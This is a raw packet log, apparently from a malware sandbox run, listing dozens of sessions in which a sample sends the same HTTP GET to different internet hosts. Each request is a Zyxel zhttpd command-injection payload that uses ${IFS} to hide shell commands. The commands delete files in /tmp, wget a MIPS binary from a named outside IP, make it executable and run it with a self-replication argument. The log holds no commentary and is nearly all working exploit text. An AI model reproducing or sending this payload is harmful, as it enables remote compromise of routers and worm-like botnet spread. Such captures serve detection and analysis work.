                                                Jan 28, 2024 10:16:27.850492954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5085192.168.2.2356348149.178.140.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850517988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5086192.168.2.2339508141.39.109.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850573063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5087192.168.2.235697683.20.70.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850610971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5088192.168.2.23329181.113.238.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850622892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5089192.168.2.2347302173.249.230.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850646019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5090192.168.2.2346600195.145.48.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850646973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5091192.168.2.234283040.40.234.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850653887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5092192.168.2.2341920193.250.104.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850686073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5093192.168.2.2358120172.139.247.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850744963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5094192.168.2.235377035.65.73.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850759983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5095192.168.2.2353988167.55.137.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850799084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5096192.168.2.23513928.9.140.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850821018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5097192.168.2.2342290180.172.9.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850851059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5098192.168.2.2350648154.24.32.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850877047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5099192.168.2.2353662209.156.220.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850914955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5100192.168.2.2343186151.103.159.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850950003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5101192.168.2.2340332145.208.201.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.850950956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5102192.168.2.2354710169.103.200.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851000071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5103192.168.2.2359138145.1.96.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851031065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5104192.168.2.2347782137.38.14.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851041079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5105192.168.2.2341734175.140.190.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851062059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5106192.168.2.2341590157.121.59.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851089001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5107192.168.2.2357664212.163.129.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851139069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5108192.168.2.235377876.16.192.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851147890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5109192.168.2.2335382182.85.42.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851154089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5110192.168.2.2353112139.90.17.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851207018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5111192.168.2.2354026170.244.125.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851223946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5112192.168.2.2358726199.20.202.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851252079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5113192.168.2.234768071.223.160.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851289034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5114192.168.2.2359150223.203.71.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851325035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5115192.168.2.2343600126.255.221.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851325035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5116192.168.2.234726036.253.162.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851352930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5117192.168.2.2344846193.0.106.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851368904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5118192.168.2.233489447.188.196.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851402044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5119192.168.2.236031459.16.67.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851402044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5120192.168.2.234829693.24.145.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851453066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5121192.168.2.2339610169.159.170.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851463079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5122192.168.2.2341136154.243.181.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851486921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5123192.168.2.2337106221.255.225.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851511955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5124192.168.2.234214075.118.199.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851550102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5125192.168.2.235099093.156.172.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851592064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5126192.168.2.2354406148.139.130.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851613045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5127192.168.2.2352666132.213.50.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851650953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5128192.168.2.235751490.146.137.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851670027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5129192.168.2.2349688206.18.203.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851706982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5130192.168.2.236075642.170.5.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851739883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5131192.168.2.236063278.243.223.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851768970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5132192.168.2.2358510183.120.6.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851783037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5133192.168.2.2340424166.40.88.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851807117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5134192.168.2.2334690211.55.28.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851857901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5135192.168.2.2360168107.86.103.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851877928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5136192.168.2.2335978106.216.0.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851906061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5137192.168.2.233748484.146.206.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851932049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5138192.168.2.2354078190.187.192.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851953983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5139192.168.2.233577492.118.229.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.851988077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5140192.168.2.2353670141.244.200.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.852021933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5141192.168.2.235379464.125.225.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.852045059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5142192.168.2.234572458.215.154.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.852072001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5143192.168.2.2341722218.216.53.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.852114916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5144192.168.2.2351426221.47.35.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855324030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5145192.168.2.233862459.170.24.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:27.855341911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5146192.168.2.2352382172.170.50.245443
                                                TimestampBytes transferredDirectionData
